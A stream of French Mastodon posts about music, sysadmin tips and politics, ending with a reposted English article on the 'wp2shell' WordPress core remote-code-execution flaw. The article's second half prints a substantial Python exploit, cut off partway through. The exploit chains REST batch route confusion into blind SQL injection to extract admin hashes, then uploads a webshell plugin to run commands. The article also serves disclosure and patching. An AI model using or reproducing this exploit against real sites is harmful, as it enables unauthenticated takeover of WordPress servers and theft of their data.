@nicosomb Ils sont actifs depuis quelques mois et ont compromis pas mal de monde. Leurs cible semblent super aléatoires:
@nicosomb Ah oui, c'est pas juste le ransomware qui chiffre les données, demande des sous et se barre. Il y a une vraie fuite :/.
Bon courage à toi et tes équipes.
@nicosomb courage 😥
Accès aux outils perdus ?
[EDIT : me suis fait ma compile moi même...sur des souvenirs et à coup de Youtube-DL]
Quelqu'une connaîtrait le nom d'une compilation sur CD avec des trucs des années 2K genre :
Alien Ant Farm (smooth criminal), Ugly Kid Joe, Spin Doctors (Two Princess), Puddle Of Mud, Fountain of Wine, L7, etc... ? (Même si y'a Niclkeback ça passe... limite mais ok quand même ! 😜 )
@brunus une "compilation sur CD"… Mec, t'es officiellement vieux… 🤣
De nos jour, on cherche plutôt des playlists Spotify (ou équivalent). C'est pas plutôt ça que tu voudrais ? En plus, tu fais la tienne et tu ajoutes ou enlève les morceaux en fonction de tes propres goûts…
@vetetix Ouai je ne suis pas abonné... j'utilise surtout Bandcamp en achetant des versions numériques. Mais là c'est une compile de trucs que j'ai en tête... du coup, je cherche les vidéos sur YouTube et j'en récupère la bande son avec yt-dlp ... finalement, titre après titre ça m'en rappelle un autre et ainsi de suite... j'en suis à 15 morceaux. Reste plus qu'à les tagguer correctement avec easytag !
@brunus bon, ça va, tu remontes dans mon estime, la "compil" était une base de départ pour avoir des idées.
Sinon, mon grand-père devait avoir les 45 tours d'Édith Piaf, ça t'intéresse ? 😇
@vetetix Rhaaaa de la chanson réaliste française ! Tout ce que je déteste !
Sauf... Brassens à petite dose... et si c'est Piaf alors j'aime la version de Cyclope, groupe alternatif FR des années 85-90...
https://youtu.be/p-s_lWNdD2A?list=RDp-s_lWNdD2A
Et Brel ça passe quand c'est Amsterdam mais par Konintern Sect :D
@vetetix ... j'ai eu des parents communistes pratiquants... j'ai été bercé par Jean Ferrat... je ne peux plus écouter Jean Ferrat... même les meilleures... j'ai fais une OD !
Il y a les Brassen's not dead, en groupe marrant de punk-rock FR qui font des covers de Georges. Faudrait que je regarde si ils ont repris "la messe au pendu", c'est ma préférée.
@brunus pas mal, cette reprise de Piaf. Je préfère la version originale, mais le côté punk rock n'est pas dégueu.
@brunus Stacy's mum 😂😂
@VoronoV Ouai bha hein ! ... J'adorai la mélodie... on va dire ça !
(Je vais ajouter du Smashin Pumpkins et Rage Against The Machine... ça reste logique question époque...)
@brunus
Tant que t'y est prends direct toute la BO de Tony Hawk Pro Skater
https://music.youtube.com/playlist?list=PLgZLkKtuVCo2yVWAWVeWjbUpeFXML3BBt
(qui a fait découvrir Millencolin au monde entier)😁
@matiu_bidule @VoronoV ... bha tu sais quoi... bien que skater depuis les années 70-80... je n'ai jamais joué à Tony Hawk Pro Skater ! J'ai du des collègues y jouer mais ça ne m'a pas fait envie... trop abusé ! ... mais total respect pour Tony Hawk lui même hein.
@brunus
Ah ben je le prends pas mal j'ai jamais joué à aucun jeu vidéo depuis Tetris, environ.
Mais je sais par mes amis que la BO du jeu est la compil la plus juste du son de cette époque, et ressemble en partie à ce que tu as montré de ta playlist.
C'est pour donner des idées de trucs que tu aurai pu oublier.
@VoronoV
@brunus
Sinon c'est quand même une de mes périodes musicales préférées de toute ma vie il y a quelques single inoubliables genre
Teenage Dirtbag de Wheatus , For Your Lungs Only de Alkaline Trio , My Favorite Game des Cardigans Alright de Supergrass... Je pourrai t'en proposer des dizaines comme ça, un peu obscures 😁😅
@matiu_bidule @VoronoV Je ne les connais pas ceux là, j'étais dans une période bizarre pendant laquelle je commençais à écouter Pennywise, Slipknot, Guano Apes... d'ailleurs je vais ajouter Guano Apes "Lords of the boards" ! On l'écoutait au moins une deux fois chaque week-end d'hiver en montant au snowboard !
Par contre il y a des groupes de l'époque que je ne supporte pas, genre Sum 41 ... trop naïf et commercial...
Ah, merci @brunus, ça rappelle des souvenirs tout ça ! Dans les années 2000 je m'étais fait une compil' sur minidisc à écouter en dévalant les pistes en snowboard. Avec des trucs comme Big Soul, Therapy?, EMF, Body Count, Hole, Soundgarden, Dog Eat Dog... Et du Smashing Pumpkins bien sûr, vu que j'avais d'ailleurs nommée d'après un de leurs morceaux (Me Rock You Snow).
@brome @matiu_bidule @VoronoV Ho merci de ce message !
Ma compile s'étoffe chaque jour... tu viens de me remémorer Body Count et Soundgarden, ils en feront partis.
J'ai ajouté Prodigy également "Vodoo People" (j'ai hésité à mettre "Firestarter" mais je ne veux qu'un titre par groupe), et Iggy Pop "The passenger".
Je viens de penser à Fatboy Slim et un de ses morceaux les plus punky "Ya Mama".
Je ne connais pas les autres dont tu parle, je vais écouter. 🙏🏻
ok bah, la morale de l'histoire, si vous voulez récuperer de l'espace disque sur proxmox, procéder à un trim des conteneurs LXC est une très très très bonne manière de faire.
C'était un stockage qui a fait tampon de données le temps d'un gros transfert, et qui maintenant est réduit à un espace bien moindre.
@oldsysops c'est visiblement uniquement utile sur un système de fichiers ext4 pour le repository de stockage
Linux Desktop Market Share Surpasses 10% in North America https://linuxiac.com/linux-desktop-market-share-surpasses-10-in-north-america/
Je suis dans un TGV où quelqu'un a un réseau wifi nommé « Bored hot communist ».
Avec un nom comme ça, je suis sûr qu'il s'agit de quelqu'un du fediverse ! 🧐
J'hésite entre @Clailou et @AugierLe42e.
@AugierLe42e kr kr kr - j'espère qu'on est pas les seuls @parleur 😎
@Clailou @AugierLe42e @parleur
Et du coup, t'as pécho ou c'était un·e tankie ?
@nartagnan @AugierLe42e @parleur
Dans le TGV, je cherche les réseaux 🥵
@Clailou Envoie « commie » au 8 12 12 pour découvrir les communistes chauds dans ta région.
@nartagnan @parleur
@AugierLe42e
Le prochain qui écrit le mot « chaud » dans ma ma TL avant novembre prochain, c'est kickban immédiat !
@Clailou @nartagnan
@parleur Les communistes sexy de ta région ? 👀
@Clailou @nartagnan
RE: https://amicale.net/@afpfr/117013709118730843
😐️
Un Bourguignon a repartagé🇫🇷 L'Ukraine a annoncé vendredi l'envoi en France de 70 secouristes et 15 véhicules spécialisés pour aider à la lutte contre les feux de forêt dans le sud-ouest qui ont entraîné l'évacuation de 200.000 personnes.
@jor
ah ouai quand même
@blackRAT On a pas du tout l’air cons, non non. 😐️
@mimimaton @blackRAT Ouais, mais il y a sûrement moyen de trouver des pays encore plus dans la merde à qui demander hein. Je suis sûr qu’on peut encore creuser. 😐️
@jor @blackRAT alors, par contre, je ne lis pas que la France demande directement de l' aide à l'Ukraine, je lis que l'Ukraine envoie de l' aide à la France. Bon. C'est pas plus glorieux mais au moins j'analyse pas ça comme l'Elysée qui appelle un matin Kiyv pour savoir si c'est ok de réquisitionner du matos.
Quand t’as tellement sacrifié les moyens des services publics depuis des décennies que t’as besoin de l’aide d’un pays en guerre et pilonné depuis quatre ans par la Russie. 😐️
C’est vraiment la giga-louse quand même. 😐️
France Louse. 😐️
La France, septième puissance économique mondiale et tout là, cocorico, qui est tellement gérée par des incompétent·e·s et des salopards corrompu·e·s depuis des décennies qu’on a besoin qu’un pays en guerre et en ruines nous file un coup de main contre des pauvres petits incendies. 😐️
Gravement en avance, j'ai fait des propositions pour la pycon.fr @AFPy
Je propose un atelier participatif d'avancées sur @lebureau_coop histoire de me faire submerger de contributions (celles de la pycon précédente ne sont pas toutes intégrées, je vous parle même pas de celles de la stagiaire @eidamned )
et je propose une conf personnelle et intime «Créer un nouveau service libre en Python de nos jours, c'est facile ?» , où je vais parler de, et ça c'est une surprise, @lebureau_coop
@AFPy @lebureau_coop @eidamned
sachez que la description de la conf a été validée par @tut_tuuut (qui a pouffé en la lisant) et qui est, je cite, "gravement dégoûtée de ne pas pouvoir y assister"
ah, et la stagialternante n'est pas encore au courant, mais elle co-anime l'atelier 🫰
Il y a toujours de la place pour les copains qui passent.
Cette phrase est :
| HOHOHO et je suis né•e après 1989: | 6 |
| innocente et je suis né•e après 1989: | 6 |
| HOHOHO et je suis ne•e jusqu'en 1989: | 53 |
| innocente et je suis né•e jusqu'en 1989: | 12 |
Terminé
@ffeth je jure le vert s'est mis tout seul sur ce rond-là lors de l'affichage de la page, venant d'un thread..
@bituur_esztreym à 33cm près c'était correct ?
@ffeth 33cm ?
@bituur_esztreym ah non 30
@ffeth et ?
@bituur_esztreym ben tu dis que t'as mal cliqué ou bien j'ai pas compris ?
@ffeth ah non j'ai pas dit ça. plutôt que ça avait bien sélectionné tout seul. et je continue à ne pas voir le rapport avec la taille de la-.. euh le nombre de cm..
@bituur_esztreym ah ben si t'es tombé direct pile dans le bon trou forcément ma blague tombe à côté
@ffeth Vu les votes on est d'accord, les jeunes ont pas la ref ?
C'est ouf. Soit y a personne de 36 ans et moins ici, soit iels sont cloqués dessus, soit iels ne voient pas d'intérêt à répondre à une question aussi étrange
Contexte de la question : hier à la gardo de besac la chanson résonnait à pleine puissance, et je n'ai pas réussi à savoir si c'était une cover qui changeait la mélodie ou un karaoké qui zappait l'essentiel des couplets.
@Camille_Poulsard Oui oui :)
@Camille_Poulsard Hier je relisais les paroles de "Félicie aussi" de Fernandel et j'étais très déçu, alors je vais éviter de vérifier la qualité de celles de Daniela outre les quelques unes qui sont gravées au burin dans le disque d'or des trucs que ma mémoire refuse d'oublier
@ffeth @Camille_Poulsard
aaaah oui bon, je passai complètement à côté hier soir, de fait !
@ffeth J'ai un prénom de naissance, utilisé dans les années Elmer, en 3 syllabes, terminant par -la... je peux te dire que j'en ai bien souffert de cette chanson de merde.
@ffeth C'est l'équivalent de "viens je mords pas" ?
@ffeth j'ai la réf et jsuis pile de 89, je coche quoi ? X)
(Excellent concert de Saint Valentin avec s/o d'ailleurs 😬)
@ffeth celle là dans le bus qui nous emmenait en voyage scolaire on l'avait cachée au milieu de chansons de Goldman ou des Innocents que la prof de latin nous laissait mettre dans le lecteur du bus.
On avait préparé nos cassettes bien a l'avance.
On s'était bien fait engueuler.
@ffeth Je ne pouvais pas passer à côté… Dans mon lycée, il y avait un frère ou cousin d’un des membres du groupe, et les cassettes d’enregistrements « dans le garage » circulaient bien avant qu’ils soient connus :-)
On recrute éditrice/éditeur !
Hello... je vous ai toujours dis du bien de la boite pour laquelle je bosse, et de ce qu'on y fait, j'en suis fier (30 ans de maison) : principalement des livres jeunesse, du parascolaire, du loisir créatif etc...
Mila est une de nos maison d'édition, iels cherchent un.e éditeurice.
https://www.linkedin.com/jobs/view/4444929963/
(pour en savoir plus utilisez l'adresse mail de l'annonce, ne me demandez pas à moi, ne suis au courant de rien...et je préfère ! 😜 )
bon dimanche à tous, garder le frais, éviter les flammes.
@oldsysops ah. Je suis admiratif. J'en emmène deux pour ma part: le pro et le perso car on ne sait jamais. Ma résolution c'est de ne lire le mail qu'une fois par jour.
@oldsysops J'emmène toujours le PC (pro) en vacances ou en week end mais c'est parce que j'y fout mes séries dessus pour les regarder en mode patate de canapé après une grosse journée de promenades :D
Généralement je regarde pas mes mails pour autant, je reste déconnecté sauf si on m'appelle (mais les collègues sont bien éduqués et n'appellent pas)
Entendu à la télé « en fait les pluies en hiver ont eu un effet inverse, parce que la flore a pu se régénérer et ça alimente le feu »
Vivement qu’on ait canicule toute l’année, y’aura plus de plantes à cramer.
@nicosomb
Saletés de plantes !
@oldsysops le problème des skateparks c’est que ça attire des sales jeunes qui font des trucs de sales jeunes. Les parkings aussi en fait. Donc, seulement des autoroutes, et obligation de tourner éternellement chacun dans sa petite boîte. @gub @nicosomb
TEST vous ne détestez pas les vegan, ce que vous détestez c'est le capitalisme TEST 2026-07-24 00:38:58 [fish script on a NetBSD server] #capitalisme
ça a l'air de marcher.
je finis la liste de choses qu'on croit détester, je créé le compte et je mets en prod.
idée volée à @joachim
c'est du fish, je le refais en python ou ça vous intéresse de voir le script fish?
| fish: | 7 |
| python: | 2 |
Terminé
@alter_unicorn en Perl ?
@cocker @alter_unicorn et pourquoi pas en powershell pendant que tu y es ?
@missbullitt @cocker faut pas que ça sorte d'Internet, mais j'ai déjà fait du powershell. ça fait partie des trucs que je me mets pas dans mon CV.
@alter_unicorn @missbullitt mais pourquoi tu couches ça par écrit ??
(Capture d'écran faite)
ne fesons pas du victime shaming! @alter_unicorn@masto.bike : tu regrettes d'avoir fait du powershell hein ? 😉
moi j'ai déjà fait du .bat (tellement nul que je me rappelle plus le nom du "langage " de script en mode ms-dos)
et aujourd'hui je peut dire : plus jamais !
@oldsysops j'ai fait du windev sous 3.11, j'avais besoin de le dire... Merci @missbullitt @alter_unicorn
@cocker @oldsysops @alter_unicorn alors? Elle est comment la fille en maillot de bain ?
@missbullitt d'un mauvais goût total 😁 @oldsysops @alter_unicorn
@cocker @missbullitt @oldsysops j'ai pas la réf.
je ne suis pas assez jeune pour ne pas l'avoir, c'est juste que j'ai commencé l'informatique tard dans la vie.
(pas besoin d'être éduqué sur du windev)
@alter_unicorn Pendant longtemps, les boites Windev, c'était ça @cocker @oldsysops
@missbullitt @alter_unicorn @cocker @oldsysops Et c’est clairement pas le pire qu’ils aient fait.
@breizh oui mais ils ont expurgé les images qui restent sur internet. @alter_unicorn @cocker @oldsysops
@missbullitt @alter_unicorn @cocker @oldsysops Oh, on en trouve encore de belles (si je puis dire). Mais je vais pas les mettre ici, on a compris.
@oldsysops je me shame tout seul, j'assume :)
j'ai fait du Perl aussi, seul dans un datacenter pas loin du détroit d'Ormuz pour donner un indice géographique facilement identifiable, et dans un bureau construit dans un ancien hangar dans le sud de Paris.
(j'ai pire en stock)
@oldsysops @cocker @missbullitt @alter_unicorn Ici le PowerShell c’était dans le cadre de mes études (en licence pro).
Par contre j’ai fait du Batch pour le fun avant ça. À une époque où je ne savais même pas ce qu’était Linux.
Mais en vrai, PowerShell est pas si mauvais comme langage de programmation. C’est juste pas du tout adapté pour un shell, ce qui est… dommage, vu qu’il est conçu pour en être un…
@alter_unicorn @missbullitt @cocker
haaaaan
Nan mais pour dépanner sa marche 😁
Faut bien en faire pour installer wsl...
@olorin113 on peut l'installer sur linux aussi. @missbullitt @cocker
@alter_unicorn fyshon
@Joannanewsomsuperfan hmm.
what a conundrum.
je ne sais pas quel GIF mettre en réponse.
tu m'as cassé le cerveau.
ça fait du bien, berdol.
J'espère pouvoir à un moment bosser sur le fait de fournir aussi un service pour faire du primaire, mais je ne sais pas si un projet existant sympa pour ça existe ou s'il va falloir coder l'outil nous-même …
J’aime bien quand je trouve un film bof : ça me rappelle ce que j’apprécie dans d’autres
(case in point, L’Odyssée)
LUCY PARSONS
je continue mes histoires d'anars en antropomorphisme et en couleurs de type bleu parce que je trouve ça joli le bleu-gris.
Aujourd'hui Lucy Parsons, née esclave et qui faisait des tournée pour propager l'anarchisme, un peu comme un groupe anarcho-punk aujourd'hui mais avec des trucs à dire et sans 8.6
https://davidsnugblog.wordpress.com
Licence CC BY-SA
Tout comme les adresses des serveurs mail sont listés sur listes d'exclusion, la même chose pourrait elle être efficace comme les IA fouineuses ?
Il ne s'agit d'une liste d'adresses statiques, mais vraimetn d'une liste dsitribuée via les techniques de dns comme les DNSbl de spamhaus par exemple.
Il est évident qu'il y aura des dégats colatéraux comme les adresses ip 'empruntées' par des applications 'peu scrupuleuses ' sur les smartphone, mais à interdire l'accès à certains média cela rendra ces applications visibles pour ce qu'elles sont : irrespectueuses.
il est aussi possible d'inverser le système et de faire des listes d'adresses ip respectueuses...
Difficile de trouver une plateforme de #facturationélectronique intéressante pour les micro entreprises non assujéties à la TVA, qui ne soit ni hébergée par un gafam ni par une entité utilisant l'ia... Des pistes ?
mais j'ai pas testé...
🚨 CRITICAL: WordPress Core "wp2shell" RCE
A single anonymous HTTP request can lead to Remote Code Execution on vulnerable WordPress Core installations.
⚠️ No plugins.
⚠️ No themes.
⚠️ No authentication required.
Tracked as:
🔴 CVE-2026-63030 (REST API Batch Route Confusion → RCE)
🔴 CVE-2026-60137 (Facilitated SQL Injection)
Affected versions
• WordPress 6.9.0–6.9.4
• WordPress 7.0.0–7.0.1
✅ Update immediately to WordPress 6.9.5 or 7.0.2. Due to the severity, WordPress has enabled forced automatic security updates for affected installations.
🔗 Full technical analysis:
https://thecybersecguru.com/news/wordpress-core-rce-wp2shell/
#WordPress #WordPressSecurity #wp2shell #CVE202663030 #CVE202660137 #RCE #RemoteCodeExecution #SQLInjection #RESTAPI #CyberSecurity #InfoSec #WebSecurity #WebsiteSecurity #PatchNow #ThreatIntelligence #BlueTeam #SOC #Linux #PHP #ZeroDay #SecurityResearch #SysAdmin #DevSecOps
Critical WordPress Core Flaw “wp2shell” Enables No-Auth Remote Code Execution on Default Installs
A critical WordPress core vulnerability dubbed wp2shell allows unauthenticated remote code execution on default installs. Update to 7.0.2 for patch [CONTENU SENSIBLE]
A newly disclosed vulnerability chain in WordPress core has prompted one of the project’s most aggressive emergency responses in recent years.
Security researchers have revealed a flaw, dubbed wp2shell, that allows an unauthenticated attacker to execute code against vulnerable WordPress installations. Unlike the majority of WordPress compromises that depend on outdated plugins or vulnerable themes, this issue resides entirely within WordPress core and affects even a freshly installed website with no plugins and no custom themes.
To limit exposure, the WordPress Security Team released WordPress 7.0.2 and WordPress 6.9.5, while simultaneously enabling forced automatic security updates for affected installations. This is a mechanism WordPress reserves only for its most severe security incidents.
Although there are currently no confirmed reports of active exploitation, security professionals expect attackers to begin reverse engineering the patch quickly. Administrators should treat this as an urgent patching priority.
What Is wp2shell?
The vulnerability, publicly known as wp2shell, is a pre-authentication Remote Code Execution (RCE) chain affecting recent versions of WordPress.
Unlike authenticated vulnerabilities that require an attacker to first obtain administrator credentials, this flaw can be triggered through a single anonymous HTTP request.
That distinction dramatically changes the risk profile.
An attacker does not need:
- Administrator privileges
- User credentials
- Installed plugins
- A vulnerable theme
- Any prior access to the website
If the site is running an affected version, the vulnerable code is already present.
Researchers from Assetnote, part of Searchlight Cyber, discovered the issue and reported it responsibly through WordPress’ HackerOne bug bounty program.
📬 Stay Ahead of Cyber Threats
Get the latest cybersecurity news, critical vulnerabilities, threat intelligence, tutorials, and exclusive giveaways delivered straight to your inbox. No spam. Unsubscribe anytime.
Subscribe to the Newsletter →Affected Versions
The vulnerability impacts only newer WordPress releases.
Version
Status
6.8.x and earlier
Not affected by the RCE chain
6.9.0 – 6.9.4
Vulnerable
7.0.0 – 7.0.1
Vulnerable
6.9.5
Fixed
7.0.2
Fixed
7.1 Beta 2
Fixed
WordPress 6.8.6 was released separately to address another SQL injection vulnerability but is not vulnerable to the wp2shell RCE chain.
Why This Vulnerability Is Different
WordPress vulnerabilities are unfortunately common, but they almost always originate from third-party components.
Historically, most large-scale WordPress compromises have involved:
- Outdated plugins
- Poorly written themes
- Exposed administrator panels
- Weak credentials
wp2shell breaks that pattern.
The vulnerable component exists inside WordPress itself, meaning every affected installation shares the same attack surface regardless of what plugins are installed.
A default installation is sufficient.
That makes patch adoption significantly more important than plugin management in this case.
Technical Analysis
WP2Shell Infographic
The Vulnerable Component
The attack begins with WordPress’ REST API endpoint:
POST /wp-json/batch/v1
The REST Batch API allows multiple API requests to be bundled into a single HTTP request.
Internally, WordPress validates each sub-request individually before dispatching it to its corresponding handler.
Under normal circumstances, every request should remain associated with the handler that originally validated it.
The vulnerability arises because that association can become corrupted.
Route Confusion
Introduced in WordPress 5.6, the REST Batch API (
/wp-json/batch/v1) allows clients to bundle multiple sub-requests into a single HTTP call. The core functionserve_batch_request_v1()processes these by building two parallel arrays:$matches(the matched route handler) and$validation(the validation result)The vulnerability stems from a desynchronization bug. If a sub-request path fails PHP’s
wp_parse_url()(for example, by passing a malformed path like///), it generates aWP_Errorthat is appended to the$validationarray, but not to the$matchesarray. This causes the arrays to fall out of step. When the dispatcher iterates through the requests using a shared index offset, it inadvertently dispatches a sub-request under the next sub-request’s handler. This is what Researchers identified and what WordPress describes as a REST API batch-route confusion vulnerability.Internally, the batch dispatcher builds two arrays:
- Matched route handlers
- Validation results
These arrays are expected to remain perfectly synchronized.
However, malformed request paths can cause validation entries to be inserted without corresponding route handlers.
Once the arrays lose alignment, subsequent requests may execute under the wrong handler.
Conceptually, the process looks like this:
Incoming Batch Request
│
▼
Validation Array
Request A
Request B
Request C
Route Handler Array
Handler A
Handler B
Alignment Lost
After synchronization breaks, a request validated under one endpoint may execute using another endpoint’s permissions and processing logic.
This is the foundation of the route confusion vulnerability.
wp2shell PoC. Credit – @assetnote on X/Twitter
From Route Confusion to SQL Injection
The disclosed proof of concept demonstrates how attackers leverage this confusion to reach an unexpected SQL injection path.
Instead of processing a request through the intended REST endpoint, WordPress eventually dispatches user-controlled parameters into a vulnerable query.
One parameter in particular becomes important:
author_exclude
Normally, this parameter would not be accepted by the endpoint handling user requests.
Because route validation becomes confused, however, the parameter reaches WP_Query, where it is interpreted as:
author__not_in
On vulnerable versions, that value is incorporated into SQL in a manner that enables injection.
Researchers demonstrated:
- Boolean-based SQL injection
- Time-based blind SQL injection
without requiring authentication.
PoC (Proof of Concept Code)
The
wp2shellPoC elegantly exploits this desynchronization twice to achieve unauthenticated SQL injection:
- Outer Batch: A
POST /wp/v2/postsrequest is dispatched, but due to the desync, it is handled by the batch processor itself. Because it was initially validated as apostsrequest, its internalrequestsbody bypasses the strict batch schema validation, allowing it to smuggleGETrequests (bypassing the batchPOST-only allow-list).- Inner Batch: Inside this smuggled payload, a
GET /wp/v2/usersrequest is sent with a fabricatedauthor_excludeparameter. Theusersschema does not define this parameter, so WordPress passes the raw string untouched. However, due to a second desync, this request is executed under thepostsget_items()handler. There,author_excludeis mistakenly mapped to theWP_Queryauthor__not_invariable, which is directly interpolated into the SQL query as a string.By injecting a payload like
0) OR SLEEP(3)-- -, an attacker can achieve reliable, time-based blind SQL injection without any authentication. This allows for the extraction of administrator password hashes, which can then be cracked offline and used to upload a malicious plugin, completing the RCE chain.Below is a unified, single-file Python 3.8+ PoC. It requires no third-party dependencies and implements the
check,read, andshellcommands described in the original advisory.⚠️ Disclaimer: This tool is provided for educational purposes and authorized security testing only. Do not use this against any system you do not own or have explicit written permission to test. Some parts of code have been intentionally altered for making it suitable for educational purposes
wp2shell.py#!/usr/bin/env python3
"""
wp2shell-poc: Independent proof-of-concept for CVE-2026-63030
Unauthenticated WordPress REST batch route-confusion SQL injection.
Requires Python 3.8+. No third-party dependencies.
"""
import argparse
import http.cookiejar
import io
import json
import re
import secrets
import statistics
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
import uuid
import zipfile
from dataclasses import dataclass
from typing import Any, Callable, Dict, List, Optional, Tuple
# --- Constants & Helpers ---
_DESYNC_PRIMER = {"method": "POST", "path": "///"}
_BATCH_MARKER_CODES = ("parse_path_failed", "block_cannot_read", "rest_batch_not_allowed")
def _progress(text: str) -> None:
sys.stdout.write(f"\rExtracting: {text}")
sys.stdout.flush()
def _clear_progress() -> None:
sys.stdout.write("\r" + " " * 60 + "\r")
sys.stdout.flush()
def _info(msg: str) -> None:
print(f"[*] {msg}")
def _good(msg: str) -> None:
print(f"[+] {msg}")
def _bad(msg: str) -> None:
print(f"[-] {msg}")
def _warn(msg: str) -> None:
print(f"[!] {msg}")
# --- HTTP Client ---
class TargetError(Exception):
pass
dataclass
class Response:
status: int
elapsed: float
body: str
def json(self) -> Any:
return json.loads(self.body)
class BatchClient:
def __init__(self, base_url: str, *, timeout: float = 30.0, rest_route: bool = False, proxy: Optional[str] = None, user_agent: str = "wp2shell"):
self.base_url = base_url.rstrip("/")
self.timeout = timeout
self.rest_route = rest_route
self.user_agent = user_agent
handlers = [urllib.request.ProxyHandler({"http": proxy, "https": proxy})] if proxy else []
self._opener = urllib.request.build_opener(*handlers)
property
def endpoint(self) -> str:
if self.rest_route:
return f"{self.base_url}/?rest_route=/batch/v1"
return f"{self.base_url}/wp-json/batch/v1"
def post(self, payload: dict) -> Response:
request = urllib.request.Request(self.endpoint, data=json.dumps(payload).encode(), method="POST", headers={"Content-Type": "application/json", "User-Agent": self.user_agent})
start = time.monotonic()
try:
resp = self._opener.open(request, timeout=self.timeout)
status, body = resp.status, resp.read().decode("utf-8", "replace")
except urllib.error.HTTPError as exc:
status, body = exc.code, exc.read().decode("utf-8", "replace")
except OSError as exc:
raise TargetError(f"cannot reach {self.endpoint}: {getattr(exc, 'reason', exc)}") from None
return Response(status, time.monotonic() - start, body)
def get(self, path: str) -> Response:
url = self.base_url + (path if path.startswith("/") else f"/{path}")
request = urllib.request.Request(url, method="GET", headers={"User-Agent": self.user_agent})
start = time.monotonic()
try:
resp = self._opener.open(request, timeout=self.timeout)
status, body = resp.status, resp.read().decode("utf-8", "replace")
except urllib.error.HTTPError as exc:
status, body = exc.code, exc.read().decode("utf-8", "replace")
except OSError as exc:
raise TargetError(f"cannot reach {url}: {getattr(exc, 'reason', exc)}") from None
return Response(status, time.monotonic() - start, body)
def marker_probe(self) -> Response:
return self.post({"requests": [_DESYNC_PRIMER, {"method": "POST", "path": "/wp/v2/posts"}, {"method": "POST", "path": "/wp/v2/block-renderer/core/archives"}, {"method": "POST", "path": "/batch/v1", "body": {"requests": []}}]})
staticmethod
def batch_marker_codes(response: Response) -> tuple:
try:
body = response.json()
except ValueError:
return ()
found = []
def walk(value) -> None:
if isinstance(value, dict):
code = value.get("code")
if code in _BATCH_MARKER_CODES and code not in found:
found.append(code)
for child in value.values():
walk(child)
elif isinstance(value, list):
for child in value:
walk(child)
walk(body)
return tuple(found)
staticmethod
def has_route_confusion_markers(response: Response) -> bool:
codes = BatchClient.batch_marker_codes(response)
return all(code in codes for code in _BATCH_MARKER_CODES)
def inject(self, author_not_in: str) -> Response:
return self.post(self._payload(author_not_in))
def rows(self, response: Response) -> Optional[list]:
try:
inner = response.json()["responses"][1]["body"]
result = inner["responses"][1]["body"]
except (KeyError, IndexError, TypeError, ValueError):
return None
return result if isinstance(result, list) else None
staticmethod
def _payload(author_not_in: str) -> dict:
inner = {"requests": [_DESYNC_PRIMER, {"method": "GET", "path": "/wp/v2/users?author_exclude=" + urllib.parse.quote(author_not_in, safe="")}, {"method": "GET", "path": "/wp/v2/posts"}]}
return {"requests": [_DESYNC_PRIMER, {"method": "POST", "path": "/wp/v2/posts", "body": inner}, {"method": "POST", "path": "/batch/v1", "body": {"requests": []}}]}
# --- SQLi Logic ---
dataclass
class TimingConfirmation:
confirmed: bool
baseline: float
delayed: float
delta: float
threshold: float
samples: Tuple[Tuple[float, float], ...]
class BlindSQLi:
def __init__(self, client: BatchClient, *, sleep: float = 3.0) -> None:
self.client = client
self.sleep = sleep
self.requests = 0
def confirm_timing(self, *, samples: int = 3) -> TimingConfirmation:
pairs = []
for _ in range(samples):
baseline = self._elapsed("SLEEP(0)")
delayed = self._elapsed(f"SLEEP({self.sleep:g})")
pairs.append((baseline, delayed))
baselines = [pair[0] for pair in pairs]
delayed = [pair[1] for pair in pairs]
deltas = [delay - base for base, delay in pairs]
baseline_median = statistics.median(baselines)
delayed_median = statistics.median(delayed)
delta_median = statistics.median(deltas)
threshold = max(0.75, self.sleep * 0.65)
return TimingConfirmation(confirmed=delta_median >= threshold, baseline=baseline_median, delayed=delayed_median, delta=delta_median, threshold=threshold, samples=tuple(pairs))
def extract(self, expression: str, *, max_length: int = 128, on_char: Optional[Callable[[str], None]] = None) -> str:
chars = []
for position in range(1, max_length + 1):
probe = f"ASCII(SUBSTRING(COALESCE(({expression}),''),{position},1))"
if not self._true(f"{probe} > 0"):
break
low, high = 32, 126
while low < high:
mid = (low + high) // 2
if self._true(f"{probe} > {mid}"):
low = mid + 1
else:
high = mid
chars.append(chr(low))
if on_char:
on_char("".join(chars))
return "".join(chars)
def integer(self, expression: str) -> int:
text = self.extract(expression).strip()
return int(text) if text.lstrip("-").isdigit() else 0
def _elapsed(self, sql: str) -> float:
self.requests += 1
return self.client.inject(f"0) OR {sql}-- -").elapsed
def _true(self, condition: str) -> bool:
self.requests += 1
return bool(self.client.rows(self.client.inject(f"0) AND ({condition})-- -")))
# --- Post-Auth Shell Logic ---
class AdminSession:
def __init__(self, base_url: str, *, timeout: float = 20.0, proxy: Optional[str] = None):
self.base_url = base_url.rstrip("/")
self.timeout = timeout
self._slug = "wp2shell_" + secrets.token_hex(4)
self._token = secrets.token_hex(16)
self._jar = http.cookiejar.CookieJar()
handlers = [urllib.request.HTTPCookieProcessor(self._jar)]
if proxy:
handlers.append(urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
self._opener = urllib.request.build_opener(*handlers)
self._opener.addheaders = [("User-Agent", "wp2shell")]
def login(self, username: str, password: str) -> bool:
self._get("/wp-login.php")
self._post("/wp-login.php", {"log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": f"{self.base_url}/wp-admin/", "testcookie": "1"})
return any(c.name.startswith("wordpress_logged_in") for c in self._jar)
def deploy_webshell(self) -> str:
page = self._get("/wp-admin/plugin-install.php?tab=upload")
nonce = self._nonce(page)
if not nonce:
raise RuntimeError("plugin-upload nonce not found (are the credentials valid?)")
body, content_type = self._multipart({"_wpnonce": nonce, "_wp_http_referer": "/wp-admin/plugin-install.php?tab=upload", "install-plugin-submit": "Install Now"}, {"pluginzip": (f"{self._slug}.zip", self._plugin_zip())})
self._post("/wp-admin/update.php?action=upload-plugin", body, {"Content-Type": content_type})
return f"/wp-content/plugins/{self._slug}/{self._slug}.php"
def run(self, shell_path: str, command: str) -> Optional[str]:
query = urllib.parse.urlencode({"t": self._token, "c": command})
output = self._get(f"{shell_path}?{query}")
match = re.search(r"WP2SHELL::(.*?)::END", output, re.S)
return match.group(1) if match else None
def _get(self, path: str) -> str:
return self._opener.open(self.base_url + path, timeout=self.timeout).read().decode("utf-8", "replace")
def _post(self, path: str, data, headers: Optional[dict] = None) -> str:
if isinstance(data, dict):
data = urllib.parse.urlencode(data).encode()
request = urllib.request.Request(self.base_url + path, data=data, headers=headers or {})
return self._opener.open(request, timeout=self.timeout).read().decode("utf-8", "replace")
def _plugin_zip(self) -> bytes:
